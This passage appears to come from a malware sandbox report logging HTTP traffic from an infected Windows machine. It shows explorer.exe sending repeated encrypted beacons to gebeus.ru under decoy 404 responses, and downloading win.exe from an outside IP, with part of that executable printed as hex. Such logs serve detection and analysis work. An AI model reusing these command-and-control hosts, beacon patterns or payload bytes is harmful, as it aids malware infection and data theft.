Jul 24, 2024 19:56:21.836607933 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49732	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:21.848895073 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jpenaelwjof.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: gebeus.ru
Jul 24, 2024 19:56:21.848895073 CEST	175	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 4d 2f d0 be Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuM/(a{_v:Z[Hl\|4_cUku>PQ\P#A+B%qHF;
Jul 24, 2024 19:56:22.971920013 CEST	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49733	64.190.113.113	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:24.069581985 CEST	159	OUT	GET /win.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 64.190.113.113
Jul 24, 2024 19:56:24.675224066 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:56:24 GMT Server: Apache Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT ETag: "f1600-61ddb109e6b16" Accept-Ranges: bytes Content-Length: 988672 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
Jul 24, 2024 19:56:24.675364017 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57 Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=\|(=/2t=uL$&D$'0GwAE
Jul 24, 2024 19:56:24.675379992 CEST	1236	IN	Data Raw: d2 0f 44 f7 45 84 c9 0f 44 f7 66 90 81 fe 89 ee d9 12 7f 78 81 fe 3a c2 31 ce 0f 8f fc 00 00 00 81 fe 05 3b ec ae 0f 8f 0c 02 00 00 81 fe 5d 9b 1e 9c 0f 8f d5 03 00 00 81 fe 3b d2 d3 8c 0f 8e 63 07 00 00 81 fe f8 a0 fd 96 0f 8e 29 0c 00 00 81 fe Data Ascii: DEDfx:1;];c)EC5uD$D$DL$hf\|K4@0\|:<6.:8:899: L$X
Jul 24, 2024 19:56:24.676071882 CEST	1236	IN	Data Raw: fb ff ff 81 fe 94 f4 98 0a 0f 8e d5 05 00 00 81 fe 06 5d 3b 0f 0f 8e c8 0a 00 00 81 fe 07 5d 3b 0f 0f 84 3d 13 00 00 81 fe 64 e5 f0 10 0f 84 4b 13 00 00 81 fe e1 5c 3f 11 0f 85 f9 fa ff ff 44 8b 8c 24 f8 00 00 00 44 0f af 8c 24 d0 01 00 00 45 89 Data Ascii: ];];=dK\?D$D$EAE!D$999Tv){*{"}V2~D$D$ D$D$$D$D$(DYAyA=I
Jul 24, 2024 19:56:24.676086903 CEST	1236	IN	Data Raw: f6 ff ff 81 fe 49 fa 3f 58 0f 8f bd 08 00 00 81 fe e3 62 e0 55 0f 84 5c 11 00 00 81 fe cd ae cd 56 0f 85 3d f6 ff ff 4c 8b 8c 24 50 02 00 00 45 0f b6 09 44 8b 74 24 2c 41 ff c6 44 8b 54 24 2c 47 88 0c 10 44 8b 8c 24 64 01 00 00 44 89 8c 24 c4 00 Data Ascii: I?XbU\V=L$PEDt$,ADT$,GD$dD$PG$DL$0D$/^^Y\|$F~_u\(DL$<D$D$ D$?}:E@?~DL$HAD$X
Jul 24, 2024 19:56:24.676795006 CEST	1236	IN	Data Raw: 44 89 8c 24 cc 00 00 00 e9 83 f1 ff ff 81 fe 88 fe 14 5e 0f 84 b6 0f 00 00 81 fe 10 59 3f 5f 0f 85 6b f1 ff ff 44 8b 0d 64 fe 0e 00 44 8b 15 61 fe 0e 00 44 89 94 24 90 01 00 00 45 8d 51 01 45 0f af d1 45 89 d1 41 83 f1 fe 45 21 d1 44 89 8c 24 94 Data Ascii: D$^Y?_kDdDaD$EQEEAE!D$1TOZD$DL$8D$DL$<DL$8AAh%AtDL$DL$ DL$8D$DL$<D$:CeE
Jul 24, 2024 19:56:24.676810026 CEST	1236	IN	Data Raw: c1 44 89 8c 24 d8 01 00 00 44 8b 4c 24 68 46 0f b6 0c 09 44 88 4c 24 24 be 94 64 3b 6f e9 9a ec ff ff 81 fe a4 16 e3 71 0f 84 95 0e 00 00 81 fe 1c 4e 37 72 0f 85 82 ec ff ff be 5a 4e fa 05 e9 78 ec ff ff 81 fe 19 68 60 cc 0f 84 ad 0e 00 00 81 fe Data Ascii: D$DL$hFDL$$d;oqN7rZNxh`}`Vh%7%>4PDDD$EQEAD$VS{TD
Jul 24, 2024 19:56:24.677608013 CEST	1236	IN	Data Raw: ff c1 44 89 8c 24 e4 01 00 00 be 1f c5 74 ff e9 d4 e7 ff ff 44 8b 4c 24 60 45 01 c9 44 89 8c 24 a8 01 00 00 be 14 af 62 29 e9 ba e7 ff ff 44 8b 4c 24 4c 49 01 c9 4c 89 8c 24 50 02 00 00 be cd ae cd 56 e9 a0 e7 ff ff be 30 c4 7f a1 e9 96 e7 ff ff Data Ascii: D$tDL$`ED$b)DL$LIL$PV0DL$DT$DD0ZNZNfN7r\DAAD$DL\|A1'AAL\|E1D@0t+AL$D$D$DL$\|D$
Jul 24, 2024 19:56:24.677622080 CEST	1236	IN	Data Raw: e1 01 44 88 4c 24 20 be ad 22 aa 0e e9 03 e3 ff ff 44 8b 4c 24 34 44 89 8c 24 a8 00 00 00 be 0a 46 7e 5f 44 8b 8c 24 8c 01 00 00 44 89 8c 24 98 00 00 00 e9 dc e2 ff ff be fa 14 3a 43 e9 d2 e2 ff ff 44 8b 94 24 14 02 00 00 45 85 d2 40 0f 94 c6 44 Data Ascii: DL$ "DL$4D$F~_D$D$:CD$E@D$A@@0{{uAMEED$DL$`D$DL$dDL$`AAD$DL$`AAqNYAC];9$4D$D$0A
Jul 24, 2024 19:56:24.678333044 CEST	1236	IN	Data Raw: ff 44 8b 4c 24 04 45 01 c9 44 89 8c 24 78 01 00 00 be 1e 54 4f a7 e9 25 de ff ff 44 0f b6 4c 24 1a 44 0f b6 54 24 1b 44 89 ce 44 30 d6 be e6 06 77 6f bf e6 06 77 6f 0f 85 f5 dd ff ff bf 70 fb e4 68 e9 eb dd ff ff 44 8b 0d f2 ea 0e 00 44 8b 15 ef Data Ascii: DL$ED$xTO%DL$DT$DD0wowophDDD$EQEEAE!D$-WDL$,L$8EDL$4DT$41A9@3A9AAD$U&OuD$DL$PD$D$L$ E
Jul 24, 2024 19:56:24.680499077 CEST	1236	IN	Data Raw: f7 e9 36 fd ff ff 3d 94 d2 e7 1c 0f 84 70 01 00 00 3d ac f6 9c 2b 0f 85 20 fd ff ff b8 10 c6 f2 de e9 16 fd ff ff 83 7d c8 00 0f 94 c0 0a 45 e5 0f b6 c0 83 e0 01 f7 d8 89 45 c4 b8 8e f5 c1 05 e9 f7 fc ff ff 48 8b 45 a8 c6 00 13 48 8b 45 e8 c6 40 Data Ascii: 6=p=+ }EEHEHE@HE@HE@HE@HE@HEHHE`H)HHE H)HHE %vHMH H EEHEHERSbF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49734	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:25.685601950 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tfqtvoxxlfyfid.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: gebeus.ru
Jul 24, 2024 19:56:25.685638905 CEST	330	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 7a 19 cf e7 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA ,[k,vuzt5D{[D3\|.llD"\|G!h (]WA6mMH~q!_v (D.=`6pI&TkS/?-
Jul 24, 2024 19:56:26.858165026 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49735	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:26.872417927 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mhvibsdewxn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: gebeus.ru
Jul 24, 2024 19:56:26.872442007 CEST	328	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 64 57 e9 ab Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vudWjOjR~%MLeOLlaGh]<OVrF(-2{QbR8%ht:*v>(G!);[YjZCn
Jul 24, 2024 19:56:27.937855959 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49736	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:27.951421976 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://akvufandfxiqflw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: gebeus.ru
Jul 24, 2024 19:56:27.951631069 CEST	254	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 34 4f b6 9e Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vu4O1SVoMX{"ClCca8_TQI1\I?d^CZ3`Z!BL@oM1&-#qeLQ/=d\|MT'
Jul 24, 2024 19:56:29.005528927 CEST	206	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49740	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:39.531964064 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bqhvneiiyelqwiyv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: gebeus.ru
Jul 24, 2024 19:56:39.531994104 CEST	130	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 04 6b 2c 90 f4 76 0b 75 79 0f e8 bd Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA ,[k,vuy_L_XG3m+p/?o_3
Jul 24, 2024 19:56:40.621087074 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49742	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:40.629564047 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oqgvummtqov.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: gebeus.ru
Jul 24, 2024 19:56:40.629585028 CEST	120	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 67 02 da 99 Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuga)cDx'o~=_q9Zk
Jul 24, 2024 19:56:41.775023937 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:41 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49743	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:41.935538054 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vxvnjhhjwdcwv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 289 Host: gebeus.ru
Jul 24, 2024 19:56:41.935538054 CEST	289	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 43 30 fc fb Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA -[k,vuC0Vhy\|>k3l[c{W!UH\l"?)Q2\|k"@}n4JoHOkCG2cr,V1
Jul 24, 2024 19:56:43.052568913 CEST	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 7f 48 e6 3d 09 f2 e8 42 f1 91 ed a1 31 da 2d da f5 6c 49 10 98 9f 9f dd 2a d1 26 10 Data Ascii: #\6H=B1-lI*&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49747	189.165.133.52	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 19:56:44.439362049 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wagishcpburncp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: gebeus.ru
Jul 24, 2024 19:56:44.439431906 CEST	365	OUT	Data Raw: 3b 6e 59 17 f2 c9 1e 24 ab a8 b0 07 74 07 7d c9 7a 0d b9 e7 19 08 e1 60 7b 0f 73 96 32 c5 c6 62 9e 2c c3 20 05 68 20 6e 9f 9b 3f c1 3d 38 da 8e 7f b9 1a 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1a 6b 2c 90 f4 76 0b 75 7c 4f b8 bc Data Ascii: ;nY$t}z`{s2b, h n?=8t M@NA ,[k,vu\|OtATo];OHzsv#^[%//.SJ$'WwBRW,MBN0T`/kwPqb\|wD:LRs
Jul 24, 2024 19:56:45.603816032 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 24 Jul 2024 17:56:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 